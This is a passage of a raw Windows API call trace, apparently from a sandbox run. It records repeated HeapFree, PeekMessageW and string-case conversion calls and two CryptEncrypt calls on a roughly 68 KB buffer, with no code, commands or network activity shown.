lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.228] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.228] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.228] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.228] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.229] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.229] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0207.229] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.230] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.230] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.230] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.231] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.231] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d3650 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.235] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x109f6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x109f8) returned 1 [0207.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.236] CharLowerBuffW (in: lpsz="byte[68088]", cchLength=0xb | out: lpsz="byte[68088]") returned 0xb [0207.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.238] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.238] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.238] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.238] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.238] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.238] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.239] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d3650*, pdwDataLen=0x8bef68*=0x109f6, dwBufLen=0x109f8 | out: pbData=0x34d3650*, pdwDataLen=0x8bef68*=0x109f8) returned 1 [0207.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.241] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.241] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.241] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.241] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.241] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.242] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.242] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.247] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.247] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.247] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.252] CharUpperBuffW (in: lpsz="A3500402704", 